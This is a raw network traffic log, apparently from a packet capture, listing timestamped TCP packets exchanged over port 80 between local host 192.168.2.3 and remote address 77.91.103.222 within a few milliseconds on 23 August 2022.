Aug 23, 2022 18:24:03.441013098 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441036940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441057920 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441062927 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441076040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441102028 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441118002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441137075 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441162109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441185951 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441190958 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441194057 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441204071 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441229105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441239119 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441261053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441282034 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441286087 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441297054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441340923 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441346884 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441378117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441406012 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441428900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441452980 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441477060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441503048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441513062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441517115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441519976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441523075 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441545963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441581964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441611052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441628933 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441644907 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441670895 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441694975 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441720963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441726923 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441732883 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441735983 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.441761971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441781998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441801071 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441818953 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441838026 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441858053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441875935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441894054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441911936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441929102 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441946983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441965103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.441983938 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442004919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442023039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442042112 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442061901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442079067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442097902 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442116022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442136049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442154884 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442173004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442192078 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442209005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442229986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442249060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442266941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442284107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442305088 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442328930 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442348957 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442368984 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442389011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442409992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442435980 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442490101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442518950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442545891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442570925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442586899 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442593098 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442616940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442651033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442676067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442681074 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442684889 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442692995 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442718983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442743063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442765951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442780018 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442785025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442805052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442826986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442838907 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442843914 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442866087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442890882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442899942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442931890 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442954063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.442982912 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442989111 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442991972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.442996025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443006992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443031073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443054914 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443078041 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443092108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443114996 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443140030 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443166971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443182945 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443196058 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443212986 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443233967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443257093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443290949 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443306923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443334103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443372011 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443377972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443396091 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443422079 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443444967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443473101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443500996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443514109 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443531990 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443536043 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443558931 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443582058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443605900 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443609953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443622112 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443644047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443661928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443671942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443686008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443706989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443722963 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443742037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443764925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443794012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443799973 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443813086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443837881 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443859100 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443862915 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443875074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443900108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443934917 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443958998 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.443969011 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443973064 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443991899 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.443995953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444025040 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444036961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444071054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444102049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444113970 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444119930 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444149971 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444181919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444196939 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444206953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444242001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444276094 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444304943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444339991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444359064 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444366932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444372892 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444401979 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444434881 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444470882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444504023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444530010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444549084 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444559097 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444564104 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444566965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444598913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444633961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444713116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444746017 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444780111 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444794893 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444802999 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444848061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.444930077 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.444962978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445003033 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445012093 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445043087 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445079088 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445086956 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445091963 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445095062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445122004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445158005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445185900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445219994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445234060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445239067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445242882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445266008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445292950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445312977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445337057 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445363045 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445389032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445424080 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445445061 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445450068 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445481062 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445511103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445586920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445622921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445631981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445636034 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445660114 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445688009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445724010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445739031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445744038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445801020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445842028 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445892096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445905924 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445914984 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445924044 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.445951939 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.445986032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446002960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446007967 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446038961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446072102 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446104050 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446120977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446125984 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446131945 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446162939 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446188927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446218014 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446253061 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446269989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446274042 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446280003 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446310043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446337938 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446371078 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446402073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446434021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446453094 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446456909 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446460009 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446491003 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446518898 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446547985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446573019 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446587086 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446592093 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446597099 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446625948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446655035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446688890 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446732044 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446743965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446748972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446754932 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446783066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446814060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446844101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446861029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446865082 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446871996 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.446902037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446935892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446965933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.446996927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447014093 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447017908 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447021961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447052002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447083950 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447117090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447144032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447150946 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447154999 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447158098 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447160959 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447180986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447206020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447227955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447249889 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447254896 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447267056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447288990 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447313070 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447335958 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447340965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447344065 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447382927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447402954 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447417021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447441101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447465897 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447488070 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447510958 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447535038 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447542906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447547913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447551012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447570086 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447592974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447607040 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447613001 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447617054 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447635889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447660923 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447685957 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447710991 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447715998 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447720051 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.447731018 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447758913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.447783947 CEST	80	49844	77.91.103.222	192.168.2.3
